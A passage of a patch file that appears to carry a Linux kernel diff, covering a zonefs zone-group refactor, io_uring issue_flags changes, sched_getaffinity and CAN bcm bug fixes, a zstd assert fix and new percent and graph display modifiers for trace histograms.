+-	struct zonefs_zone_data zd;
+ 	struct zonefs_sb_info *sbi;
+ 	struct inode *inode;
+ 	enum zonefs_ztype t;
+@@ -1845,16 +1107,6 @@ static int zonefs_fill_super(struct super_block *sb, void *data, int silent)
+ 	if (ret)
+ 		return ret;
+ 
+-	memset(&zd, 0, sizeof(struct zonefs_zone_data));
+-	zd.sb = sb;
+-	ret = zonefs_get_zone_info(&zd);
+-	if (ret)
+-		goto cleanup;
+-
+-	ret = zonefs_sysfs_register(sb);
+-	if (ret)
+-		goto cleanup;
+-
+ 	zonefs_info(sb, "Mounting %u zones", bdev_nr_zones(sb->s_bdev));
+ 
+ 	if (!sbi->s_max_wro_seq_files &&
+@@ -1865,6 +1117,11 @@ static int zonefs_fill_super(struct super_block *sb, void *data, int silent)
+ 		sbi->s_mount_opts &= ~ZONEFS_MNTOPT_EXPLICIT_OPEN;
+ 	}
+ 
++	/* Initialize the zone groups */
++	ret = zonefs_init_zgroups(sb);
++	if (ret)
++		goto cleanup;
++
+ 	/* Create root directory inode */
+ 	ret = -ENOMEM;
+ 	inode = new_inode(sb);
+@@ -1884,13 +1141,19 @@ static int zonefs_fill_super(struct super_block *sb, void *data, int silent)
+ 
+ 	/* Create and populate files in zone groups directories */
+ 	for (t = 0; t < ZONEFS_ZTYPE_MAX; t++) {
+-		ret = zonefs_create_zgroup(&zd, t);
++		ret = zonefs_create_zgroup_inodes(sb, t);
+ 		if (ret)
+-			break;
++			goto cleanup;
+ 	}
+ 
++	ret = zonefs_sysfs_register(sb);
++	if (ret)
++		goto cleanup;
++
++	return 0;
++
+ cleanup:
+-	zonefs_cleanup_zone_info(&zd);
++	zonefs_free_zgroups(sb);
+ 
+ 	return ret;
+ }
+@@ -1909,6 +1172,7 @@ static void zonefs_kill_super(struct super_block *sb)
+ 		d_genocide(sb->s_root);
+ 
+ 	zonefs_sysfs_unregister(sb);
++	zonefs_free_zgroups(sb);
+ 	kill_block_super(sb);
+ 	kfree(sbi);
+ }
+diff --git a/fs/zonefs/trace.h b/fs/zonefs/trace.h
+index 42edcfd393ed2..9969db3a9c7dc 100644
+--- a/fs/zonefs/trace.h
++++ b/fs/zonefs/trace.h
+@@ -20,8 +20,9 @@
+ #define show_dev(dev) MAJOR(dev), MINOR(dev)
+ 
+ TRACE_EVENT(zonefs_zone_mgmt,
+-	    TP_PROTO(struct inode *inode, enum req_op op),
+-	    TP_ARGS(inode, op),
++	    TP_PROTO(struct super_block *sb, struct zonefs_zone *z,
++		     enum req_op op),
++	    TP_ARGS(sb, z, op),
+ 	    TP_STRUCT__entry(
+ 			     __field(dev_t, dev)
+ 			     __field(ino_t, ino)
+@@ -30,12 +31,12 @@ TRACE_EVENT(zonefs_zone_mgmt,
+ 			     __field(sector_t, nr_sectors)
+ 	    ),
+ 	    TP_fast_assign(
+-			   __entry->dev = inode->i_sb->s_dev;
+-			   __entry->ino = inode->i_ino;
++			   __entry->dev = sb->s_dev;
++			   __entry->ino =
++				z->z_sector >> ZONEFS_SB(sb)->s_zone_sectors_shift;
+ 			   __entry->op = op;
+-			   __entry->sector = ZONEFS_I(inode)->i_zsector;
+-			   __entry->nr_sectors =
+-				   ZONEFS_I(inode)->i_zone_size >> SECTOR_SHIFT;
++			   __entry->sector = z->z_sector;
++			   __entry->nr_sectors = z->z_size >> SECTOR_SHIFT;
+ 	    ),
+ 	    TP_printk("bdev=(%d,%d), ino=%lu op=%s, sector=%llu, nr_sectors=%llu",
+ 		      show_dev(__entry->dev), (unsigned long)__entry->ino,
+@@ -58,9 +59,10 @@ TRACE_EVENT(zonefs_file_dio_append,
+ 	    TP_fast_assign(
+ 			   __entry->dev = inode->i_sb->s_dev;
+ 			   __entry->ino = inode->i_ino;
+-			   __entry->sector = ZONEFS_I(inode)->i_zsector;
++			   __entry->sector = zonefs_inode_zone(inode)->z_sector;
+ 			   __entry->size = size;
+-			   __entry->wpoffset = ZONEFS_I(inode)->i_wpoffset;
++			   __entry->wpoffset =
++				zonefs_inode_zone(inode)->z_wpoffset;
+ 			   __entry->ret = ret;
+ 	    ),
+ 	    TP_printk("bdev=(%d, %d), ino=%lu, sector=%llu, size=%zu, wpoffset=%llu, ret=%zu",
+diff --git a/fs/zonefs/zonefs.h b/fs/zonefs/zonefs.h
+index 1dbe78119ff16..2d626e18b1411 100644
+--- a/fs/zonefs/zonefs.h
++++ b/fs/zonefs/zonefs.h
+@@ -39,31 +39,47 @@ static inline enum zonefs_ztype zonefs_zone_type(struct blk_zone *zone)
+ 	return ZONEFS_ZTYPE_SEQ;
+ }
+ 
+-#define ZONEFS_ZONE_OPEN	(1U << 0)
+-#define ZONEFS_ZONE_ACTIVE	(1U << 1)
+-#define ZONEFS_ZONE_OFFLINE	(1U << 2)
+-#define ZONEFS_ZONE_READONLY	(1U << 3)
++#define ZONEFS_ZONE_INIT_MODE	(1U << 0)
++#define ZONEFS_ZONE_OPEN	(1U << 1)
++#define ZONEFS_ZONE_ACTIVE	(1U << 2)
++#define ZONEFS_ZONE_OFFLINE	(1U << 3)
++#define ZONEFS_ZONE_READONLY	(1U << 4)
++#define ZONEFS_ZONE_CNV		(1U << 31)
+ 
+ /*
+- * In-memory inode data.
++ * In-memory per-file inode zone data.
+  */
+-struct zonefs_inode_info {
+-	struct inode		i_vnode;
++struct zonefs_zone {
++	/* Zone state flags */
++	unsigned int		z_flags;
+ 
+-	/* File zone type */
+-	enum zonefs_ztype	i_ztype;
++	/* Zone start sector (512B unit) */
++	sector_t		z_sector;
+ 
+-	/* File zone start sector (512B unit) */
+-	sector_t		i_zsector;
++	/* Zone size (bytes) */
++	loff_t			z_size;
+ 
+-	/* File zone write pointer position (sequential zones only) */
+-	loff_t			i_wpoffset;
++	/* Zone capacity (file maximum size, bytes) */
++	loff_t			z_capacity;
+ 
+-	/* File maximum size */
+-	loff_t			i_max_size;
++	/* Write pointer offset in the zone (sequential zones only, bytes) */
++	loff_t			z_wpoffset;
++};
+ 
+-	/* File zone size */
+-	loff_t			i_zone_size;
++/*
++ * In-memory zone group information: all zones of a group are exposed
++ * as files, one file per zone.
++ */
++struct zonefs_zone_group {
++	unsigned int		g_nr_zones;
++	struct zonefs_zone	*g_zones;
++};
++
++/*
++ * In-memory inode data.
++ */
++struct zonefs_inode_info {
++	struct inode		i_vnode;
+ 
+ 	/*
+ 	 * To serialise fully against both syscall and mmap based IO and
+@@ -82,7 +98,6 @@ struct zonefs_inode_info {
+ 
+ 	/* guarded by i_truncate_mutex */
+ 	unsigned int		i_wr_refcnt;
+-	unsigned int		i_flags;
+ };
+ 
+ static inline struct zonefs_inode_info *ZONEFS_I(struct inode *inode)
+@@ -90,6 +105,31 @@ static inline struct zonefs_inode_info *ZONEFS_I(struct inode *inode)
+ 	return container_of(inode, struct zonefs_inode_info, i_vnode);
+ }
+ 
++static inline bool zonefs_zone_is_cnv(struct zonefs_zone *z)
++{
++	return z->z_flags & ZONEFS_ZONE_CNV;
++}
++
++static inline bool zonefs_zone_is_seq(struct zonefs_zone *z)
++{
++	return !zonefs_zone_is_cnv(z);
++}
++
++static inline struct zonefs_zone *zonefs_inode_zone(struct inode *inode)
++{
++	return inode->i_private;
++}
++
++static inline bool zonefs_inode_is_cnv(struct inode *inode)
++{
++	return zonefs_zone_is_cnv(zonefs_inode_zone(inode));
++}
++
++static inline bool zonefs_inode_is_seq(struct inode *inode)
++{
++	return zonefs_zone_is_seq(zonefs_inode_zone(inode));
++}
++
+ /*
+  * On-disk super block (block 0).
+  */
+@@ -181,7 +221,7 @@ struct zonefs_sb_info {
+ 	uuid_t			s_uuid;
+ 	unsigned int		s_zone_sectors_shift;
+ 
+-	unsigned int		s_nr_files[ZONEFS_ZTYPE_MAX];
++	struct zonefs_zone_group s_zgroup[ZONEFS_ZTYPE_MAX];
+ 
+ 	loff_t			s_blocks;
+ 	loff_t			s_used_blocks;
+@@ -209,6 +249,28 @@ static inline struct zonefs_sb_info *ZONEFS_SB(struct super_block *sb)
+ #define zonefs_warn(sb, format, args...)	\
+ 	pr_warn("zonefs (%s) WARNING: " format, sb->s_id, ## args)
+ 
++/* In super.c */
++void zonefs_inode_account_active(struct inode *inode);
++int zonefs_inode_zone_mgmt(struct inode *inode, enum req_op op);
++void zonefs_i_size_write(struct inode *inode, loff_t isize);
++void zonefs_update_stats(struct inode *inode, loff_t new_isize);
++void __zonefs_io_error(struct inode *inode, bool write);
++
++static inline void zonefs_io_error(struct inode *inode, bool write)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++
++	mutex_lock(&zi->i_truncate_mutex);
++	__zonefs_io_error(inode, write);
++	mutex_unlock(&zi->i_truncate_mutex);
++}
++
++/* In file.c */
++extern const struct address_space_operations zonefs_file_aops;
++extern const struct file_operations zonefs_file_operations;
++int zonefs_file_truncate(struct inode *inode, loff_t isize);
++
++/* In sysfs.c */
+ int zonefs_sysfs_register(struct super_block *sb);
+ void zonefs_sysfs_unregister(struct super_block *sb);
+ int zonefs_sysfs_init(void);
+diff --git a/include/linux/io_uring.h b/include/linux/io_uring.h
+index 0ded9e271523f..a1484cdb3158e 100644
+--- a/include/linux/io_uring.h
++++ b/include/linux/io_uring.h
+@@ -26,7 +26,7 @@ struct io_uring_cmd {
+ 	const void	*cmd;
+ 	union {
+ 		/* callback to defer completions to task context */
+-		void (*task_work_cb)(struct io_uring_cmd *cmd);
++		void (*task_work_cb)(struct io_uring_cmd *cmd, unsigned);
+ 		/* used for polled completion */
+ 		void *cookie;
+ 	};
+@@ -38,9 +38,10 @@ struct io_uring_cmd {
+ #if defined(CONFIG_IO_URING)
+ int io_uring_cmd_import_fixed(u64 ubuf, unsigned long len, int rw,
+ 			      struct iov_iter *iter, void *ioucmd);
+-void io_uring_cmd_done(struct io_uring_cmd *cmd, ssize_t ret, ssize_t res2);
++void io_uring_cmd_done(struct io_uring_cmd *cmd, ssize_t ret, ssize_t res2,
++			unsigned issue_flags);
+ void io_uring_cmd_complete_in_task(struct io_uring_cmd *ioucmd,
+-			void (*task_work_cb)(struct io_uring_cmd *));
++			void (*task_work_cb)(struct io_uring_cmd *, unsigned));
+ struct sock *io_uring_get_socket(struct file *file);
+ void __io_uring_cancel(bool cancel_all);
+ void __io_uring_free(struct task_struct *tsk);
+@@ -71,11 +72,11 @@ static inline int io_uring_cmd_import_fixed(u64 ubuf, unsigned long len, int rw,
+ 	return -EOPNOTSUPP;
+ }
+ static inline void io_uring_cmd_done(struct io_uring_cmd *cmd, ssize_t ret,
+-		ssize_t ret2)
++		ssize_t ret2, unsigned issue_flags)
+ {
+ }
+ static inline void io_uring_cmd_complete_in_task(struct io_uring_cmd *ioucmd,
+-			void (*task_work_cb)(struct io_uring_cmd *))
++			void (*task_work_cb)(struct io_uring_cmd *, unsigned))
+ {
+ }
+ static inline struct sock *io_uring_get_socket(struct file *file)
+diff --git a/include/trace/events/rcu.h b/include/trace/events/rcu.h
+index 90b2fb0292cb1..012fa0d171b27 100644
+--- a/include/trace/events/rcu.h
++++ b/include/trace/events/rcu.h
+@@ -768,7 +768,7 @@ TRACE_EVENT_RCU(rcu_torture_read,
+ 	TP_ARGS(rcutorturename, rhp, secs, c_old, c),
+ 
+ 	TP_STRUCT__entry(
+-		__field(char, rcutorturename[RCUTORTURENAME_LEN])
++		__array(char, rcutorturename, RCUTORTURENAME_LEN)
+ 		__field(struct rcu_head *, rhp)
+ 		__field(unsigned long, secs)
+ 		__field(unsigned long, c_old)
+diff --git a/include/xen/interface/platform.h b/include/xen/interface/platform.h
+index 655d92e803e14..79a443c65ea93 100644
+--- a/include/xen/interface/platform.h
++++ b/include/xen/interface/platform.h
+@@ -483,6 +483,8 @@ struct xenpf_symdata {
+ };
+ DEFINE_GUEST_HANDLE_STRUCT(xenpf_symdata);
+ 
++#define XENPF_get_dom0_console 64
++
+ struct xen_platform_op {
+ 	uint32_t cmd;
+ 	uint32_t interface_version; /* XENPF_INTERFACE_VERSION */
+@@ -506,6 +508,7 @@ struct xen_platform_op {
+ 		struct xenpf_mem_hotadd        mem_add;
+ 		struct xenpf_core_parking      core_parking;
+ 		struct xenpf_symdata           symdata;
++		struct dom0_vga_console_info   dom0_console;
+ 		uint8_t                        pad[128];
+ 	} u;
+ };
+diff --git a/io_uring/alloc_cache.h b/io_uring/alloc_cache.h
+index 729793ae97127..c2cde88aeed53 100644
+--- a/io_uring/alloc_cache.h
++++ b/io_uring/alloc_cache.h
+@@ -27,6 +27,7 @@ static inline struct io_cache_entry *io_alloc_cache_get(struct io_alloc_cache *c
+ 		struct hlist_node *node = cache->list.first;
+ 
+ 		hlist_del(node);
++		cache->nr_cached--;
+ 		return container_of(node, struct io_cache_entry, node);
+ 	}
+ 
+diff --git a/io_uring/poll.c b/io_uring/poll.c
+index 56dbd1863c785..4788073ec45d2 100644
+--- a/io_uring/poll.c
++++ b/io_uring/poll.c
+@@ -742,6 +742,7 @@ int io_arm_poll_handler(struct io_kiocb *req, unsigned issue_flags)
+ 	apoll = io_req_alloc_apoll(req, issue_flags);
+ 	if (!apoll)
+ 		return IO_APOLL_ABORTED;
++	req->flags &= ~(REQ_F_SINGLE_POLL | REQ_F_DOUBLE_POLL);
+ 	req->flags |= REQ_F_POLLED;
+ 	ipt.pt._qproc = io_async_queue_proc;
+ 
+diff --git a/io_uring/rsrc.h b/io_uring/rsrc.h
+index 81445a477622b..d60c758326b42 100644
+--- a/io_uring/rsrc.h
++++ b/io_uring/rsrc.h
+@@ -143,15 +143,13 @@ static inline void io_req_set_rsrc_node(struct io_kiocb *req,
+ 					unsigned int issue_flags)
+ {
+ 	if (!req->rsrc_node) {
+-		req->rsrc_node = ctx->rsrc_node;
++		io_ring_submit_lock(ctx, issue_flags);
+ 
+-		if (!(issue_flags & IO_URING_F_UNLOCKED)) {
+-			lockdep_assert_held(&ctx->uring_lock);
++		lockdep_assert_held(&ctx->uring_lock);
+ 
+-			io_charge_rsrc_node(ctx);
+-		} else {
+-			percpu_ref_get(&req->rsrc_node->refs);
+-		}
++		req->rsrc_node = ctx->rsrc_node;
++		io_charge_rsrc_node(ctx);
++		io_ring_submit_unlock(ctx, issue_flags);
+ 	}
+ }
+ 
+diff --git a/io_uring/uring_cmd.c b/io_uring/uring_cmd.c
+index 18dfc5f6a8b72..92f310dfb9fd6 100644
+--- a/io_uring/uring_cmd.c
++++ b/io_uring/uring_cmd.c
+@@ -15,12 +15,13 @@
+ static void io_uring_cmd_work(struct io_kiocb *req, bool *locked)
+ {
+ 	struct io_uring_cmd *ioucmd = io_kiocb_to_cmd(req, struct io_uring_cmd);
++	unsigned issue_flags = *locked ? 0 : IO_URING_F_UNLOCKED;
+ 
+-	ioucmd->task_work_cb(ioucmd);
++	ioucmd->task_work_cb(ioucmd, issue_flags);
+ }
+ 
+ void io_uring_cmd_complete_in_task(struct io_uring_cmd *ioucmd,
+-			void (*task_work_cb)(struct io_uring_cmd *))
++			void (*task_work_cb)(struct io_uring_cmd *, unsigned))
+ {
+ 	struct io_kiocb *req = cmd_to_io_kiocb(ioucmd);
+ 
+@@ -42,7 +43,8 @@ static inline void io_req_set_cqe32_extra(struct io_kiocb *req,
+  * Called by consumers of io_uring_cmd, if they originally returned
+  * -EIOCBQUEUED upon receiving the command.
+  */
+-void io_uring_cmd_done(struct io_uring_cmd *ioucmd, ssize_t ret, ssize_t res2)
++void io_uring_cmd_done(struct io_uring_cmd *ioucmd, ssize_t ret, ssize_t res2,
++		       unsigned issue_flags)
+ {
+ 	struct io_kiocb *req = cmd_to_io_kiocb(ioucmd);
+ 
+@@ -56,7 +58,7 @@ void io_uring_cmd_done(struct io_uring_cmd *ioucmd, ssize_t ret, ssize_t res2)
+ 		/* order with io_iopoll_req_issued() checking ->iopoll_complete */
+ 		smp_store_release(&req->iopoll_completed, 1);
+ 	else
+-		__io_req_complete(req, 0);
++		__io_req_complete(req, issue_flags);
+ }
+ EXPORT_SYMBOL_GPL(io_uring_cmd_done);
+ 
+diff --git a/kernel/compat.c b/kernel/compat.c
+index 55551989d9da5..fb50f29d9b361 100644
+--- a/kernel/compat.c
++++ b/kernel/compat.c
+@@ -152,7 +152,7 @@ COMPAT_SYSCALL_DEFINE3(sched_getaffinity, compat_pid_t,  pid, unsigned int, len,
+ 	if (len & (sizeof(compat_ulong_t)-1))
+ 		return -EINVAL;
+ 
+-	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
++	if (!zalloc_cpumask_var(&mask, GFP_KERNEL))
+ 		return -ENOMEM;
+ 
+ 	ret = sched_getaffinity(pid, mask);
+diff --git a/kernel/kcsan/Makefile b/kernel/kcsan/Makefile
+index 4f35d1bced6a2..a45f3dfc8d141 100644
+--- a/kernel/kcsan/Makefile
++++ b/kernel/kcsan/Makefile
+@@ -16,5 +16,6 @@ obj-y := core.o debugfs.o report.o
+ KCSAN_INSTRUMENT_BARRIERS_selftest.o := y
+ obj-$(CONFIG_KCSAN_SELFTEST) += selftest.o
+ 
+-CFLAGS_kcsan_test.o := $(CFLAGS_KCSAN) -g -fno-omit-frame-pointer
++CFLAGS_kcsan_test.o := $(CFLAGS_KCSAN) -fno-omit-frame-pointer
++CFLAGS_kcsan_test.o += $(DISABLE_STRUCTLEAK_PLUGIN)
+ obj-$(CONFIG_KCSAN_KUNIT_TEST) += kcsan_test.o
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index 9ebfd484189b3..b23dcbeacdf33 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -8304,14 +8304,14 @@ SYSCALL_DEFINE3(sched_getaffinity, pid_t, pid, unsigned int, len,
+ 	if (len & (sizeof(unsigned long)-1))
+ 		return -EINVAL;
+ 
+-	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
++	if (!zalloc_cpumask_var(&mask, GFP_KERNEL))
+ 		return -ENOMEM;
+ 
+ 	ret = sched_getaffinity(pid, mask);
+ 	if (ret == 0) {
+ 		unsigned int retlen = min(len, cpumask_size());
+ 
+-		if (copy_to_user(user_mask_ptr, mask, retlen))
++		if (copy_to_user(user_mask_ptr, cpumask_bits(mask), retlen))
+ 			ret = -EFAULT;
+ 		else
+ 			ret = retlen;
+diff --git a/kernel/trace/kprobe_event_gen_test.c b/kernel/trace/kprobe_event_gen_test.c
+index c736487fc0e48..e0c420eb0b2b4 100644
+--- a/kernel/trace/kprobe_event_gen_test.c
++++ b/kernel/trace/kprobe_event_gen_test.c
+@@ -146,7 +146,7 @@ static int __init test_gen_kprobe_cmd(void)
+ 	if (trace_event_file_is_valid(gen_kprobe_test))
+ 		gen_kprobe_test = NULL;
+ 	/* We got an error after creating the event, delete it */
+-	ret = kprobe_event_delete("gen_kprobe_test");
++	kprobe_event_delete("gen_kprobe_test");
+ 	goto out;
+ }
+ 
+@@ -211,7 +211,7 @@ static int __init test_gen_kretprobe_cmd(void)
+ 	if (trace_event_file_is_valid(gen_kretprobe_test))
+ 		gen_kretprobe_test = NULL;
+ 	/* We got an error after creating the event, delete it */
+-	ret = kprobe_event_delete("gen_kretprobe_test");
++	kprobe_event_delete("gen_kretprobe_test");
+ 	goto out;
+ }
+ 
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 888980257340f..78d69b9488e45 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -5727,7 +5727,9 @@ static const char readme_msg[] =
+ 	"\t            .syscall    display a syscall id as a syscall name\n"
+ 	"\t            .log2       display log2 value rather than raw number\n"
+ 	"\t            .buckets=size  display values in groups of size rather than raw number\n"
+-	"\t            .usecs      display a common_timestamp in microseconds\n\n"
++	"\t            .usecs      display a common_timestamp in microseconds\n"
++	"\t            .percent    display a number of percentage value\n"
++	"\t            .graph      display a bar-graph of a value\n\n"
+ 	"\t    The 'pause' parameter can be used to pause an existing hist\n"
+ 	"\t    trigger or to start a hist trigger but not log any events\n"
+ 	"\t    until told to do so.  'continue' can be used to start or\n"
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index e3df03cdecbcb..2b2120ed2460f 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -506,6 +506,8 @@ enum hist_field_flags {
+ 	HIST_FIELD_FL_ALIAS		= 1 << 16,
+ 	HIST_FIELD_FL_BUCKET		= 1 << 17,
+ 	HIST_FIELD_FL_CONST		= 1 << 18,
++	HIST_FIELD_FL_PERCENT		= 1 << 19,
++	HIST_FIELD_FL_GRAPH		= 1 << 20,
+ };
+ 
+ struct var_defs {
+@@ -1708,6 +1710,10 @@ static const char *get_hist_field_flags(struct hist_field *hist_field)
+ 		flags_str = "buckets";
+ 	else if (hist_field->flags & HIST_FIELD_FL_TIMESTAMP_USECS)
+ 		flags_str = "usecs";
++	else if (hist_field->flags & HIST_FIELD_FL_PERCENT)
++		flags_str = "percent";
++	else if (hist_field->flags & HIST_FIELD_FL_GRAPH)
++		flags_str = "graph";
+ 
+ 	return flags_str;
+ }
+@@ -2320,6 +2326,14 @@ parse_field(struct hist_trigger_data *hist_data, struct trace_event_file *file,
+ 			if (ret || !(*buckets))
+ 				goto error;
+ 			*flags |= HIST_FIELD_FL_BUCKET;
++		} else if (strncmp(modifier, "percent", 7) == 0) {
++			if (*flags & (HIST_FIELD_FL_VAR | HIST_FIELD_FL_KEY))
++				goto error;
++			*flags |= HIST_FIELD_FL_PERCENT;
++		} else if (strncmp(modifier, "graph", 5) == 0) {
++			if (*flags & (HIST_FIELD_FL_VAR | HIST_FIELD_FL_KEY))
++				goto error;
++			*flags |= HIST_FIELD_FL_GRAPH;
+ 		} else {
+  error:
+ 			hist_err(tr, HIST_ERR_BAD_FIELD_MODIFIER, errpos(modifier));
+@@ -4179,6 +4193,15 @@ static int __create_val_field(struct hist_trigger_data *hist_data,
+ 		goto out;
+ 	}
+ 
++	/* Some types cannot be a value */
++	if (hist_field->flags & (HIST_FIELD_FL_GRAPH | HIST_FIELD_FL_PERCENT |
++				 HIST_FIELD_FL_BUCKET | HIST_FIELD_FL_LOG2 |
++				 HIST_FIELD_FL_SYM | HIST_FIELD_FL_SYM_OFFSET |
++				 HIST_FIELD_FL_SYSCALL | HIST_FIELD_FL_STACKTRACE)) {
++		hist_err(file->tr, HIST_ERR_BAD_FIELD_MODIFIER, errpos(field_str));
++		ret = -EINVAL;
++	}
++
+ 	hist_data->fields[val_idx] = hist_field;
+ 
+ 	++hist_data->n_vals;
+@@ -5297,33 +5320,101 @@ static void hist_trigger_print_key(struct seq_file *m,
+ 	seq_puts(m, "}");
+ }
+ 
++/* Return the percentage of @val in @total, scaled by 100 */
++static inline unsigned int __get_percentage(u64 val, u64 total)
++{
++	if (!total)
++		goto div0;
++
++	if (val < (U64_MAX / 10000))
++		return (unsigned int)div64_ul(val * 10000, total);
++
++	total = div64_u64(total, 10000);
++	if (!total)
++		goto div0;
++
++	return (unsigned int)div64_ul(val, total);
++div0:
++	return val ? UINT_MAX : 0;
++}
++
++#define BAR_CHAR '#'
++
++static inline const char *__fill_bar_str(char *buf, int size, u64 val, u64 max)
++{
++	unsigned int len = __get_percentage(val, max);
++	int i;
++
++	if (len == UINT_MAX) {
++		snprintf(buf, size, "[ERROR]");
++		return buf;
++	}
++
++	len = len * size / 10000;
++	for (i = 0; i < len && i < size; i++)
++		buf[i] = BAR_CHAR;
++	while (i < size)
++		buf[i++] = ' ';
++	buf[size] = '\0';
++
++	return buf;
++}
++
++struct hist_val_stat {
++	u64 max;
++	u64 total;
++};
++
++static void hist_trigger_print_val(struct seq_file *m, unsigned int idx,
++				   const char *field_name, unsigned long flags,
++				   struct hist_val_stat *stats,
++				   struct tracing_map_elt *elt)
++{
++	u64 val = tracing_map_read_sum(elt, idx);
++	unsigned int pc;
++	char bar[21];
++
++	if (flags & HIST_FIELD_FL_PERCENT) {
++		pc = __get_percentage(val, stats[idx].total);
++		if (pc == UINT_MAX)
++			seq_printf(m, " %s (%%):[ERROR]", field_name);
++		else
++			seq_printf(m, " %s (%%): %3u.%02u", field_name,
++					pc / 100, pc % 100);
++	} else if (flags & HIST_FIELD_FL_GRAPH) {
++		seq_printf(m, " %s: %20s", field_name,
++			   __fill_bar_str(bar, 20, val, stats[idx].max));
++	} else if (flags & HIST_FIELD_FL_HEX) {
++		seq_printf(m, " %s: %10llx", field_name, val);
++	} else {
++		seq_printf(m, " %s: %10llu", field_name, val);
++	}
++}
++
+ static void hist_trigger_entry_print(struct seq_file *m,
+ 				     struct hist_trigger_data *hist_data,
++				     struct hist_val_stat *stats,
+ 				     void *key,
+ 				     struct tracing_map_elt *elt)
+ {
+ 	const char *field_name;
+-	unsigned int i;
++	unsigned int i = HITCOUNT_IDX;
++	unsigned long flags;
+ 
+ 	hist_trigger_print_key(m, hist_data, key, elt);
+ 
+-	seq_printf(m, " hitcount: %10llu",
+-		   tracing_map_read_sum(elt, HITCOUNT_IDX));
++	/* Always show the raw hitcount first */
++	hist_trigger_print_val(m, i, "hitcount", 0, stats, elt);
+ 
+ 	for (i = 1; i < hist_data->n_vals; i++) {
+ 		field_name = hist_field_name(hist_data->fields[i], 0);
++		flags = hist_data->fields[i]->flags;
+ 
+-		if (hist_data->fields[i]->flags & HIST_FIELD_FL_VAR ||
+-		    hist_data->fields[i]->flags & HIST_FIELD_FL_EXPR)
++		if (flags & HIST_FIELD_FL_VAR || flags & HIST_FIELD_FL_EXPR)
+ 			continue;
+ 
+-		if (hist_data->fields[i]->flags & HIST_FIELD_FL_HEX) {
+-			seq_printf(m, "  %s: %10llx", field_name,
+-				   tracing_map_read_sum(elt, i));
+-		} else {
+-			seq_printf(m, "  %s: %10llu", field_name,
+-				   tracing_map_read_sum(elt, i));
+-		}
++		seq_puts(m, " ");
++		hist_trigger_print_val(m, i, field_name, flags, stats, elt);
+ 	}
+ 
+ 	print_actions(m, hist_data, elt);
+@@ -5336,7 +5427,9 @@ static int print_entries(struct seq_file *m,
+ {
+ 	struct tracing_map_sort_entry **sort_entries = NULL;
+ 	struct tracing_map *map = hist_data->map;
+-	int i, n_entries;
++	int i, j, n_entries;
++	struct hist_val_stat *stats = NULL;
++	u64 val;
+ 
+ 	n_entries = tracing_map_sort_entries(map, hist_data->sort_keys,
+ 					     hist_data->n_sort_keys,
+@@ -5344,11 +5437,34 @@ static int print_entries(struct seq_file *m,
+ 	if (n_entries < 0)
+ 		return n_entries;
+ 
++	/* Calculate the max and the total for each field if needed. */
++	for (j = 0; j < hist_data->n_vals; j++) {
++		if (!(hist_data->fields[j]->flags &
++			(HIST_FIELD_FL_PERCENT | HIST_FIELD_FL_GRAPH)))
++			continue;
++		if (!stats) {
++			stats = kcalloc(hist_data->n_vals, sizeof(*stats),
++				       GFP_KERNEL);
++			if (!stats) {
++				n_entries = -ENOMEM;
++				goto out;
++			}
++		}
++		for (i = 0; i < n_entries; i++) {
++			val = tracing_map_read_sum(sort_entries[i]->elt, j);
++			stats[j].total += val;
++			if (stats[j].max < val)
++				stats[j].max = val;
++		}
++	}
++
+ 	for (i = 0; i < n_entries; i++)
+-		hist_trigger_entry_print(m, hist_data,
++		hist_trigger_entry_print(m, hist_data, stats,
+ 					 sort_entries[i]->key,
+ 					 sort_entries[i]->elt);
+ 
++	kfree(stats);
++out:
+ 	tracing_map_destroy_sort_entries(sort_entries, n_entries);
+ 
+ 	return n_entries;
+diff --git a/lib/zstd/common/zstd_deps.h b/lib/zstd/common/zstd_deps.h
+index 7a5bf44839c9c..f06df065dec01 100644
+--- a/lib/zstd/common/zstd_deps.h
++++ b/lib/zstd/common/zstd_deps.h
+@@ -84,7 +84,7 @@ static uint64_t ZSTD_div64(uint64_t dividend, uint32_t divisor) {
+ 
+ #include <linux/kernel.h>
+ 
+-#define assert(x) WARN_ON((x))
++#define assert(x) WARN_ON(!(x))
+ 
+ #endif /* ZSTD_DEPS_ASSERT */
+ #endif /* ZSTD_DEPS_NEED_ASSERT */
+diff --git a/net/can/bcm.c b/net/can/bcm.c
+index 27706f6ace34a..a962ec2b8ba5b 100644
+--- a/net/can/bcm.c
++++ b/net/can/bcm.c
+@@ -941,6 +941,8 @@ static int bcm_tx_setup(struct bcm_msg_head *msg_head, struct msghdr *msg,
+ 
+ 			cf = op->frames + op->cfsiz * i;
+ 			err = memcpy_from_msg((u8 *)cf, msg, op->cfsiz);
++			if (err < 0)
++				goto free_op;
+ 
+ 			if (op->flags & CAN_FD_FRAME) {
+ 				if (cf->len > 64)
+@@ -950,12 +952,8 @@ static int bcm_tx_setup(struct bcm_msg_head *msg_head, struct msghdr *msg,
+ 					err = -EINVAL;
+ 			}
+ 
+-			if (err < 0) {
+-				if (op->frames != &op->sframe)
+-					kfree(op->frames);
+-				kfree(op);
+-				return err;
+-			}
++			if (err < 0)
++				goto free_op;
+ 
+ 			if (msg_head->flags & TX_CP_CAN_ID) {
+ 				/* copy can_id into frame */
+@@ -1026,6 +1024,12 @@ static int bcm_tx_setup(struct bcm_msg_head *msg_head, struct msghdr *msg,
+ 		bcm_tx_start_timer(op);
+ 
+ 	return msg_head->nframes * op->cfsiz + MHSIZ;
++
++free_op:
++	if (op->frames != &op->sframe)
++		kfree(op->frames);
++	kfree(op);
++	return err;
+ }
+ 
+ /*
+diff --git a/net/can/j1939/transport.c b/net/can/j1939/transport.c
+index 4177e96170703..848b60c9ef79e 100644
+--- a/net/can/j1939/transport.c
++++ b/net/can/j1939/transport.c
+@@ -1124,8 +1124,6 @@ static void __j1939_session_cancel(struct j1939_session *session,
+ 
+ 	if (session->sk)
+ 		j1939_sk_send_loop_abort(session->sk, session->err);
+-	else
+-		j1939_sk_errqueue(session, J1939_ERRQUEUE_RX_ABORT);
+ }
+ 
+ static void j1939_session_cancel(struct j1939_session *session,
